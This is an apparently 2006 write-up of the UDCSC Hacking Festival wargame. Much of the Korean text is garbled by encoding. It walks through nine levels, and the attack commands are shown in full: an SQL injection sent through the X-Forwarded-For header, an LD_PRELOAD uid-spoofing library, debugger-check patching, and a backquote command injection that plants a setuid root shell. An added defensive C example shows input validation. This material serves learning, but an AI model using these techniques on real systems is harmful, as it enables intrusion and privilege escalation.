UDCSC 2006 Hacking Festival Report

[hkpco@ns hkpco]$ whoami
name : Park Chan Am

id : hkpco

mail&msn : hkpco@korea.com

homepage : http://hkpco.kr/

face_quality : High

 : б


======================================================================================================

Ϻ б ̶  (?) ظ Ź帳ϴ.

̹ html̳ pdf ۼϰ ;..;

賡   ؾ߰ڽϴ. ^^;

======================================================================================================



Round 1.
----------------------------------------------------------------------

LEVEL1  
UDCSC ȸ Ȩ ߴٰ?!  
UDCSC ȸ Ȩ ̵ϱ

----------------------------------------------------------------------

The contest homepage is said to have been hacked.

`ȸȨ ̵ϱ` ŬϿ ũ   Ŭ ų(?)   ѱ ϴ.
( ũ ϳ ɸ ʾұ  )

Viewing the page source (I found it right away) shows the part below.

<iframe src=./count.php width=0 height=0></iframe>

iframe ܳ..    ϴ.

Opening http://168.188.130.240/e987463bf0418539b306409f86997a21/count.php returns:

մϴ! level1 н 'lets go together!' Դϴ.

With that, the password was obtained. ^^;





Round 2.
----------------------------------------------------------------------
LEVEL2   
 
׸ڸ ƶ!

( ׸......... ) 
 
ѹα ౸ ȭ! 
----------------------------------------------------------------------

level2   ,   ڵ尡 ִ  ҽ Ǹ ׸ ϴ.

Viewing the source shows the image names, as below.

<td width=200 height=200 background=whatisthis.jpg><img src=reddevil.jpg width=200 height=200></td>

  ΰ ġ±.

Opening whatisthis.jpg first, I found C source inside it.

 鼭   ϴ α׷̾µ,   15    ֽϴ.





Round 3.
----------------------------------------------------------------------
LEVEL3   
 
ũĿ ɸ Ż Ʈ ¥ ƿƼ ÷.
ũĿ ɸ ID ˾Ƴ Ű!  
ͳ ǵ  ƿƼ ٿε 
----------------------------------------------------------------------

This is a problem you can solve if you know how to capture packets.
It is a program that uses IRC ^^;

:padoirc.padocon.org 001 KOR|762083 :Welcome to the PADOCON IRC Network KOR|762083!otghnkz@59.15.35.196
:padoirc.padocon.org 002 KOR|762083 :Your host is padoirc.padocon.org, running version Unreal3.2.3
:padoirc.padocon.org 003 KOR|762083 :This server was created Wed Apr 27 2005 at 18:00:59 KST
:padoirc.padocon.org 004 KOR|762083 padoirc.padocon.org Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp
                                    lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:padoirc.padocon.org 005 KOR|762083 SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60
                                    NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20
                                    WALLCHOPS WATCH=128 :are supported by this server
:padoirc.padocon.org 005 KOR|762083 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,
                                    psmntirRcOAQKVGCuzNSMTG NETWORK=PADOCON CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
                                    STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:padoirc.padocon.org 251 KOR|762083 :There are 6 users and 5 invisible on 1 servers
:padoirc.padocon.org 254 KOR|762083 4 :channels formed

.
.
.

:KOR|762083!otghnkz@59.15.35.196 JOIN :#test
:padoirc.padocon.org 353 KOR|762083 #test:KOR|762083 KOR|778454 [8]KOR|762021 KOR|114838 crackers1m0dun KOR|441656 KOR|831437
:padoirc.padocon.org 366 KOR|762083 #test :End of /NAMES list.
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196    
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196    


The password is crackers1m0dun





Round 4.
----------------------------------------------------------------------
  
 
 Ư IP ϴ  Proxy Server ϴ
Ʈ ִ.  Ʈ  ϶.
 
ID  
PWD  
----------------------------------------------------------------------

̹   ξ   Ǯϴ.

  ͿĿ   ,  X-Forwarded-For޼ҵ sql injection  ߴ ־µ

( ǵ ٰ ƴϾ  ^^;)̹ ȸ ̷  ٴ...

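The problem says there is a site that uses a proxy server.

We can see that magic_quote is on.

Even with magic_quote on, that option does not apply to Apache Environment values.

level4 looks like SQL injection through an Apache Environment value.

With Achilles it takes one minute ~.

A proxy server passes along a header called X-Forwarded-For.

So let's send a request with SQL injection in that header.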


GET /c853248badee15215da287ffa39d7965/level4.php?id=test&pwd=test HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://168.188.130.240/c853248badee15215da287ffa39d7965/
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 168.188.130.240
X-Forwarded-For: 'or 0=' <- added part

û----------------------------------------

մϴ! н 'caffelatt3' Դϴ.





Round 5.
----------------------------------------------------------------------
level5 ~ level 9
Login 168.188.130.240:SSH 
id : udcsc 
password : level4's password 

-bash-3.00$ cat level5_hint
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL5  ::

. LEVEL5  
/home/udcsc/level5/level5  Ѵ.
  ̿ؼ level5 н带 ȹض.
----------------------------------------------------------------------

~,    Գ׿ @_@

̹   ־ϴ  Ǯ  ־ϴ.  ......

   ٸ ̷̷ .. ϸ鼭   Բ  ư Ƽ ߴ ־µ,,

  ̷   ...

ٸ  ־, ȸ  ǵ!, ^^;

 ο   ˷ִ,  Ѵ Ͽ   ۼؼ packetstorm  ߾µ..

 ۼ ϰ  ~, Ʒ   ũԴϴ.

http://packetstormsecurity.org/papers/attack/shl_hijacking.txt

So let's solve this problem using the technique called shared library hooking.

-bash-3.00$ /home/udcsc/level5/level5
Sorry, Your id is not level5

It says we are not level5, so let's get past the uid/gid check. (Usually when the uid is checked, the gid is checked along with it.)

-bash-3.00$ cat /etc/passwd|grep "level5"
level5:x:7979:7979::/dev/null:/sbin/nologin
-bash-3.00$ cat hk.c
#include <dlfcn.h>
#include <unistd.h>
#include <sys/types.h>

/* Preloaded overrides: every identity query reports level5's uid/gid (7979). */
uid_t geteuid( void )
{
	return 7979;
}

uid_t getuid( void )
{
	return 7979;
}

gid_t getegid( void )
{
	return 7979;
}

gid_t getgid( void )
{
	return 7979;
}
-bash-3.00$ gcc hk.c -fPIC -shared -o hk.so
-bash-3.00$ export LD_PRELOAD="/tmp/hk.so"
-bash-3.00$ /home/udcsc/level5/level5
մϴ. level5 н 'i_like_raison' Դϴ.


nice!,





Round 6.
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL6  ::

. LEVEL6  
http://168.188.130.240/level6/Labyrinth.exe ٿ޾ƶ.
----------------------------------------------------------------------

This program has a routine that does debugger detection ?_?.
Find that part and fill it with nop.
.. α  س.. ˼մϴ.( 賡  ؾ߰ڳ׿  )

004016BE     68 C4F25B00    PUSH Labyrint.005BF2C4      ;  ASCII "Debugger is detected! process terminated!"



004016BE     90             NOP
004016BE     90             NOP
004016BE     90             NOP
004016BE     90             NOP

Then find the part that prints the password (Congratulation ~~~~~~) and jmp to it ..^^





Round 7.
----------------------------------------------------------------------
-bash-3.00$ cat level7_hint
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL7  ::

. LEVEL7  
/home/udcsc/level7/level7  Ѵ.
̸ мؼ level7 н带 ȹض.
----------------------------------------------------------------------

level8 κ  1оȿ ǬͰ׿..
̹   ʿ  ..!,

-bash-3.00$ ls -l /home/udcsc/level7/level7
-r--r--r--  1 root root 4876  6 23 18:12 /home/udcsc/level7/level7
-bash-3.00$ cp /home/udcsc/level7/level7 /tmp/haha
-bash-3.00$ /tmp/haha
-bash: /tmp/haha: 㰡 źε
-bash-3.00$ chmod 755 /tmp/haha
-bash-3.00$ /tmp/haha
մϴ. level7 н '112' Դϴ.






Round 8.
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL8  ::

. LEVEL8  
   ħ ־. ׸ ƶ!
----------------------------------------------------------------------

 ħ ־ٰ մϴ. ..?  ƴѵ...^^;

I looked through setuid applications and the like, but nothing looked particularly suspicious.

  ҳ Ͽ /home丮  ҽϴ.

-bash-3.00$ cd /home
-bash-3.00$ ls -al
հ 88
drwxr-xr-x   7 root     root       4096  6 25 05:43 .
drwxr-xr-x  23 root     root       4096  6 25 06:31 ..
-rw-r--r--   1     7981       7981   24  6 23 13:00 .bash_logout
-rw-r--r--   1     7981       7981  191  6 23 13:00 .bash_profile
-rw-r--r--   1     7981       7981  124  6 23 13:00 .bashrc
-rw-r--r--   1     7981       7981  383  6 23 13:00 .emacs
drwx------   2 mysql    mysql      4096  6 22 09:40 mysql
drwx------   2     7978       7978 4096  6 23 23:35 shadow
drwx------   8 udcsc    udcsc      4096  6 25 07:48 udcsc
drwxr-xr-x   3 x15kangx x15kangx   4096  6 22 17:57 x15kangx
-bash-3.00$ cat /etc/passwd|grep "shadow"
-bash-3.00$


There is a suspicious part here.
Namely shadow!,

Let's look for files belonging to user 7981.
-bash-3.00$ find / -user     7981 2>/dev/null
/mnt/.floppy/shadow
/home/.bash_logout
/home/.bashrc
/home/.emacs
/home/.bash_profile
-bash-3.00$ cat /mnt/.floppy/shadow
mysql pwd : shad0w!?

mysql pwd obtained ^^~
mysql °  ʹ غ ̰͵ İ ..

-bash-3.00$ mysql -u shadow -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3287 to server version: 3.23.58

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+----------+
| Database |
+----------+
| level4   |
| mysql    |
| sebek    |
| shadow   |
+----------+
4 rows in set (0.00 sec)

mysql> use shadow
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+------------------+
| Tables_in_shadow |
+------------------+
| shadow           |
+------------------+
1 row in set (0.00 sec)

mysql> select * from shadow;
+--------+--------------------+
| id     | pwd                |
+--------+--------------------+
| level8 | starcraft_forever! |
+--------+--------------------+
1 row in set (0.00 sec)

mysql>





Round 9. Fight!
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL9  ::

. LEVEL9  
 Ŷ ſ  ; Ѵ.
׸ ϵ  ִ ׸   .
----------------------------------------------------------------------

 ſ ǹ̽մϴ. ׿..
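Ports 9000~9009 are open on the system.
The ports are not always open; they change from time to time..
Below are the processes from ps -aux that bind specific ports.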

root     25870  0.0  0.1  2644  320 ?        Ss   02:17   0:00 /usr/bin/level9 9005
root     25872  0.0  0.1  2856  276 ?        Ss   02:17   0:00 /usr/bin/level9 9006
root     25874  0.0  0.1  2164  324 ?        Ss   02:17   0:00 /usr/bin/level9 9007
root     25876  0.0  0.1  1516  324 ?        Ss   02:17   0:00 /usr/bin/level9 9008
root     25878  0.0  0.1  3276  320 ?        Ss   02:17   0:00 /usr/bin/level9 9009
root     26615  0.0  0.1  2280  272 ?        Ss   02:32   0:00 /usr/bin/level9 9002
root     26619  0.0  0.1  2700  324 ?        Ss   02:32   0:00 /usr/bin/level9 9004

.. ݸ ...

-bash-3.00$ ls -al /usr/bin|grep "level9"
-rwx------   1 root root       7105  6 24 23:54 level9
-rwx------   1 root root       6612  6 23 19:39 level9_send
-rwx------   1 root root        221  6 25 00:06 level9_start.sh
-bash-3.00$ (perl -e 'print "A"x256')|nc localhost 9009
input your IP:
-bash-3.00$ (perl -e 'print "A"x255')|nc localhost 9009
input your IP:
got it?-bash-3.00$

At first, because the program ended without printing got it? when given 256 bytes or more, I took it for a remote fedora_bof.

 ߿ ǵ ٸε  б ȭ  Ŷ ߰ ־ϴ.

׷   ϳ ǵ    ߰ߵǾϴ.

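The program is made to pass the ip on to level9_send, and that part is .. very .. weak.

It probably uses something like sprintf with %s to insert the ip argument as is.

Here other commands can be run by way of ; , | , & and ` `.

Let's use this to obtain root.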

-bash-3.00$ cat /tmp/aa.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
        /* take real and effective uid/gid 0, then start a shell */
        setreuid(0,0);
        setregid(0,0);
        system("/bin/sh");
        return 0;
}
-bash-3.00$ cat /tmp/c.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
        /* copy aa to kk and set the setuid/setgid bits on the copy */
        system( "cp /tmp/aa /tmp/kk" );
        system( "chmod 6755 /tmp/kk" );
        return 0;
}
-bash-3.00$ chmod 6755 aa
-bash-3.00$ chmod 6755 c
-bash-3.00$ telnet localhost 9009
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
input your IP:`/tmp/c`

got it?Connection closed by foreign host.

-bash-3.00$ /tmp/kk
sh-3.00#

Root obtained!, looking at the level9_send program will probably give the password.

Let's check once with strings.

sh-3.00# strings /usr/bin/level9_send
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
socket
inet_addr
setsockopt
strncpy
htonl
sendto
memset
htons
_IO_stdin_used
__libc_start_main
strlen
GLIBC_2.0
PTRhx
a tiny encrypted packet! <--------------------------!!!
### usage : %s your_ip ###
your input %s is too long!
168.188.130.240


So the password is a tiny encrypted packet! ^^;
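
The session above shows the level9 service running a backquoted string typed at its "input your IP:" prompt, which is what happens when client input is formatted into a shell command line. The following is an added example, not the challenge's code and not part of the original report: one way a service can hand the address to a helper is to accept only an IPv4 literal and exec the helper directly, without a shell. The function names and the helper path are assumptions.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Copy the text before the first CR/LF into out and accept it only if
 * inet_pton() parses all of it as a dotted-quad IPv4 address. Input with
 * shell metacharacters such as ; | & or backquotes cannot pass. */
int parse_client_ip(const char *line, char out[INET_ADDRSTRLEN])
{
    struct in_addr addr;
    size_t n = strcspn(line, "\r\n");

    if (n == 0 || n >= INET_ADDRSTRLEN)
        return -1;                    /* empty or longer than an IPv4 literal */
    memcpy(out, line, n);
    out[n] = '\0';
    return inet_pton(AF_INET, out, &addr) == 1 ? 0 : -1;
}

/* Run the helper with the validated address as one argv element. No shell
 * is started, so the argument is never interpreted as a command line.
 * Returns the helper's exit status, or -1 if the input was rejected or
 * the helper could not be started. helper_path is an assumption. */
int run_helper(const char *helper_path, const char *line)
{
    char ip[INET_ADDRSTRLEN];
    int status;
    pid_t pid;

    if (parse_client_ip(line, ip) != 0)
        return -1;                    /* rejected before anything is executed */
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execl(helper_path, helper_path, ip, (char *)NULL);
        _exit(127);                   /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: the address seen in the strings output and the
     * backquoted string typed at the "input your IP:" prompt. */
    printf("%d\n", run_helper("/bin/echo", "168.188.130.240\r\n"));
    printf("%d\n", run_helper("/bin/echo", "`/tmp/c`\r\n"));
    return 0;
}
```

The length check in parse_client_ip also turns away the 255- and 256-byte inputs tried earlier in the session before they reach any fixed-size buffer.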


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Afterword:::

 б ⸻̶    ʷ  ׿.   ֽñ..̤

߿  ڽϴ.

level8 ѽð ȵǼ  ǬͰ׿ 0_0  ׷츦 ϱ⸸ ߴµ  ̷ ֱ..

ȸ غѴٰ Ͻ  е  մϴ.

.. ׷  ̸  ġ Ϸ ߰ڳ׿...

ε ȳ ^^;

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

